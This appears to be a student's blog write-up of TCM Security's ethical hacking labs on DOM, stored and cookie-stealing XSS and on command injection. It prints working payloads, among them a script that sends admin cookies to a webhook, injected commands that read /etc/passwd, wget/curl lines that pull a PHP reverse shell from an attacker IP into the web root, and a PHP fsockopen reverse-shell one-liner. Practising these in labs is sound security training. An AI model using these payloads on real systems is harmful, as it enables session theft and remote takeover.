TCM Security — Practical Ethical Hacking Course — Find & Exploit Common Web Vulnerabilities — XSS & Command Injection
Cross Site Scripting — XSS
There are basically 3 types of XSS present i.e. Reflected XSS, Stored XSS & DOM-based XSS.
XSS 0x01
A input field is given and whatever we enter into the field we the site reflects that up on the website. So, it can have potential Reflected XSS Vulnerability. But when we visit the Network Section of the browser we are unable to see any kind of request being sent to the server, hence everything is occurring locally so it is a DOM Based XSS Vulnerability.
Now, we will be using the basic payload to check what is getting filtered or not. We used the payload : <img src=x onerror="prompt(1)">
On executing an Image Icon is loaded to the list and a prompt is raised as the query executes.
And hence we are able to execute the script locally, hence it contains a DOM Based XSS Vulnerability.
XSS 0x02
Here, we will be installing Firefox Multi Account Containers to solve the Second Lab.
Now, we will be basically opening the lab two times on the same browser using containers. This is so that we can analyze the changes occurring in one are being reflected in the other or not. We will also be adding a cookie editor to check how the containers are separating the login sessions. We can add a cookie in one of the container and check that cookie in the log using the command : document.cookie . It will show the cookie in the container it was added to but not in the container it wasn’t added showing that both containers have different sessions running over them.
First we’ll be using a HTML Injection to check for the Scripting. Use the basic html injection like <h1>test</h1> in one container and see the results. But when you go to the second container you will be able to see that the same injection works there too without you entering it. This show that the lab has some Potential Stored XSS Vulnerability.
XSS 0x03
Here we are required to learn Webhook to know the actual working of the payload we will be using. The payload we are using is : <script>var i = new Image;i.src=”<webhook_url”+document.cookie;</script>
Now here, we will be adding our own Webhook URL into the payload and then we can get the admin’s cookie easily. When we add this Payload as the Supporting Ticket, we get the Webhooking whenever the admin panel refreshes itself. And on refresh we get the admin’s cookie on the WebHook Server.
COMMAND INJECTION
CI is a very crucial vulnerability as we can almost run whatever run we want to through the host.
In the introduction, we will be learning to use the interactive PHP through the command : php -a
COMMAND INJECTION 0X01
While analyzing the website we found that there is a field to enter Web URLs and it provides us with a response code on the screen. And it also provides the command it ran in the backend to retrieve the result.
For reference we’ll be learning stuff from this website : https://appsecexplained.gitbook.io/appsecexplained/
So, in the above link you can find everything related Command Injection that we need to learn about. I also contains payloads which we can use to exploit the websites.
Running the command ; uname -a; asd gave me the following result :
Now we can check the password list of the system using the command like cat /etc/passwd and also we can do Ctrl+U to get the information in an organized manner.
Now to do something crazy we will be taking the help of some crazy payloads from the link : https://github.com/swisskyrepo/PayloadsAllTheThings
Now, here we’ll be trying Bash TCP. To run the Bash Payload we need to check the exact path to run the Bash first, which can be easily retrieved using the command : which bash
But using this Payload didn’t give me fruitful results so we’ll be shifting our concerns from Bash TCP to PHP which is also present on the server. And I got the result of the Path of PHP is /usr/local/bin/php . And I’ll be using the PHP Payload now. And boom I got the Reverse Shell out of it.
COMMAND INJECTION 0x02
Using Webhook : Go to webhook.site then just copy the webhook URL and add a ? to the URL and your command in the double quotes so now the Webhook will be hit and the command will be executed.
Now, here we didn’t get the command the web server is using when we entered the URL. So, then we used Webhook URL and added ?'<command>’ so when we hit enter we get the response with the query string.
Now, as we know the command is easily getting executed so we will be taking one more approach by adding this payload to the search bar : http://tcm-sec.com \\n wget ip:8080/test (here, \\n is used to get a newline) and simultaneously switch ON the python server using the command : python3 -m http.server 8080. This approach shows that the server allows to make requests
Then we will try to get a PHP Reverse Shell and copy it, using the pre-installed script in the Linux : cp /usr/share/webshells/laudanum/php/php-reverse-shell.php .
And update the Ip-Address and Port number to configured Kali you’re using.
There were two methods discussed in the video :
- [
https://tcm-sec.com](<https://tcm-sec.com/>) \\n wget 10.0.2.15:8080/rev.php - [
https://tcm-sec.com](<https://tcm-sec.com/>) && curl 10.0.2.15:8080/rev.php > /var/www/html/rev.php
And while using the second command we will switch our to NetCat on the 4444 port number to listen to the reverse shell, by the command : nc -nvlp 4444. And then we need to connect to the http://localhost/rev.php
COMMAND INJECTION 0x03
Now, on looking around and playing with the website we found that the values we provide as the “Position X” and “Position Y”, they’re getting used by the website. So, now we can try to execute a simple command/script as value)^2))}';<command>;#. Now here, the value we be taken as the input and the <command> will be executed as the next command by the Web-server.
Then, we’ll try to pop some shell. As it is a PHP Webpage, hence we’ll try to execute PHP Exploit (Reverse Shell).
We will now add our payload i.e. value)^2))}';php -r '$sock=fsockopen("10.0.2.4",4242);exec("/bin/sh -i <&3 >&3 2>&3");';#. Then we’ll open up the listener at the desired port & BOOM, we got our Reverse Shell.
Thankyou for reading. Do like👍and clap👏 if you find it insightful!!
